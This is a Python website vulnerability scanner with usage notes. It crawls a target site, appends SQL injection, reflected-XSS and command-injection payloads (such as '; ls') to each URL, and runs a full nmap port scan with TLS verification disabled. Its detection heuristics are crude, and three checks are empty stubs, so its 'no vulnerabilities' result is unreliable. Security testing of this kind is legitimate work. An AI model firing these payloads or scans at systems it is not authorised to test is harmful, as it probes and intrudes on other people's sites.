import requests
from bs4 import BeautifulSoup
from urllib.parse import urljoin, urlparse
from requests.adapters import HTTPAdapter
from urllib3.util.retry import Retry
import warnings
import subprocess
# Suppress the "Unverified HTTPS request" warnings emitted for verify=False requests
warnings.filterwarnings("ignore", message="Unverified HTTPS request")

def get_all_links(url):
    """Crawl the given page and return all links that stay on the same site."""
    session = requests.Session()
    # Retry failed connections a few times with exponential backoff
    retry = Retry(connect=3, backoff_factor=0.5)
    adapter = HTTPAdapter(max_retries=retry)
    session.mount('http://', adapter)
    session.mount('https://', adapter)
    try:
        response = session.get(url, verify=False, timeout=10)
        response.raise_for_status()
    except requests.exceptions.RequestException:
        return set()
    soup = BeautifulSoup(response.text, 'html.parser')
    links = set()
    for link in soup.find_all('a', href=True):
        full_url = urljoin(url, link['href'])
        # Keep only links under the base URL
        if full_url.startswith(url):
            links.add(full_url)
    return links

def check_sql_injection(url):
    """Append common SQL injection payloads to the URL and look for database error messages."""
    payloads = ["'", "' OR '1'='1", "' OR '1'='1' -- "]
    for payload in payloads:
        test_url = f"{url}{payload}"
        try:
            # Do not raise on HTTP errors: a 500 error page is often
            # exactly where the database error text shows up
            response = requests.get(test_url, verify=False, timeout=10)
            if "error" in response.text.lower() or "syntax" in response.text.lower():
                return True
        except requests.exceptions.RequestException:
            continue
    return False

def check_xss(url):
    """Append reflected-XSS payloads to the URL and check whether they come back unescaped."""
    payloads = ["<script>alert('XSS')</script>", "<img src=x onerror=alert('XSS')>"]
    for payload in payloads:
        test_url = f"{url}{payload}"
        try:
            response = requests.get(test_url, verify=False, timeout=10)
            response.raise_for_status()
            # If the payload is reflected verbatim, the page does not escape it
            if payload in response.text:
                return True
        except requests.exceptions.RequestException:
            continue
    return False

def check_csrf(url):
    # Placeholder: no CSRF check is implemented yet
    return False

def check_idor(url):
    # Placeholder: no IDOR check is implemented yet
    return False

def check_command_injection(url):
    """Append shell command payloads to the URL and look for directory-listing output."""
    payloads = ["; ls", "&& ls"]
    for payload in payloads:
        test_url = f"{url}{payload}"
        try:
            # As with the SQL check, error responses are still worth inspecting
            response = requests.get(test_url, verify=False, timeout=10)
            # Crude heuristic: typical Unix directory names suggest the command ran
            if "bin" in response.text or "usr" in response.text:
                return True
        except requests.exceptions.RequestException:
            continue
    return False

def check_file_upload(url):
    # Placeholder: no file upload check is implemented yet
    return False

def check_open_ports(url):
    """Run a full nmap port scan against the target host."""
    # nmap expects a hostname or IP address, not a full URL
    host = urlparse(url).hostname or url
    try:
        result = subprocess.run(['nmap', '-p-', host], capture_output=True, text=True)
        return result.stdout
    except Exception as e:
        return str(e)

base_url = ''  # enter the target site's URL here, e.g. 'https://example.com'
all_links = get_all_links(base_url)
found_any = False
for link in all_links:
    if check_sql_injection(link):
        print(f"{link} SQL injection vulnerability found")
        found_any = True
    if check_xss(link):
        print(f"{link} XSS vulnerability found")
        found_any = True
    if check_csrf(link):
        print(f"{link} CSRF vulnerability found")
        found_any = True
    if check_idor(link):
        print(f"{link} IDOR vulnerability found")
        found_any = True
    if check_command_injection(link):
        print(f"{link} command injection vulnerability found")
        found_any = True
    if check_file_upload(link):
        print(f"{link} file upload vulnerability found")
        found_any = True
if not found_any:
    print("No vulnerabilities found")
open_ports = check_open_ports(base_url)
print(f"Open ports:\n{open_ports}")

Easy to use: enter the target site's address in the base_url variable. The script will crawl the site's subpages as well, then check each one for the vulnerabilities above; if nothing is found, it reports that no vulnerabilities were found.
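
One note on how the checks work: every payload is appended to the end of the raw URL, so only trailing path values get exercised. Below is a minimal sketch of injecting into query-string parameters instead; this is my own assumption, not part of the original script, and inject_params is a hypothetical helper.

from urllib.parse import urlparse, parse_qsl, urlencode, urlunparse

def inject_params(url, payload):
    # Hypothetical helper: yield one URL variant per query parameter,
    # with the payload appended to that parameter's value
    parts = urlparse(url)
    params = parse_qsl(parts.query, keep_blank_values=True)
    for i, (key, value) in enumerate(params):
        mutated = params.copy()
        mutated[i] = (key, value + payload)
        yield urlunparse(parts._replace(query=urlencode(mutated)))

Each check function could then loop over inject_params(link, payload) instead of concatenating the payload onto the URL string.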